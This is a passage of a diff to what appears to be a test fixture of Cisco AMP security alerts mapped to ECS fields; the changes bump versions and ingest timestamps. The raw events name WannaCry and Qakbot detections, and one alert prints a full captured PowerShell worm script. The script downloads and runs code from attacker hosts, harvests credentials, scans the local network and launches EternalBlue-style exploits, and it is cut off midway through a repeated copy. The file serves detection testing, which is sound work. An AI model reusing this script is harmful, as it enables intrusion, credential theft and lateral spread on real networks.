4a116ff80df6e6031059fc3036464df\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1791,7 +1791,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1817,7 +1817,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500172540Z",
+ "ingested": "2021-09-13T18:07:28.111179351Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1870,7 +1870,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1890,7 +1890,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500174721Z",
+ "ingested": "2021-09-13T18:07:28.111181571Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1945,7 +1945,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1965,7 +1965,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500176777Z",
+ "ingested": "2021-09-13T18:07:28.111183666Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -2020,7 +2020,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2040,7 +2040,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500178843Z", + "ingested": "2021-09-13T18:07:28.111185734Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2097,7 +2097,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2121,7 +2121,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500180907Z", + "ingested": "2021-09-13T18:07:28.111187851Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2176,7 +2176,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2200,7 +2200,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500182993Z", + "ingested": "2021-09-13T18:07:28.111189928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2257,7 +2257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2283,7 +2283,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500185061Z", + "ingested": "2021-09-13T18:07:28.111192015Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2340,7 +2340,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2366,7 +2366,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500187130Z", + "ingested": "2021-09-13T18:07:28.111194086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2414,7 +2414,7 @@ { "@timestamp": "2021-01-14T16:14:44.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2432,7 +2432,7 @@ "event": { "severity": 2, "action": "Threat Detection", - "ingested": "2021-09-12T17:31:54.500189198Z", + "ingested": "2021-09-13T18:07:28.111196171Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) \"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
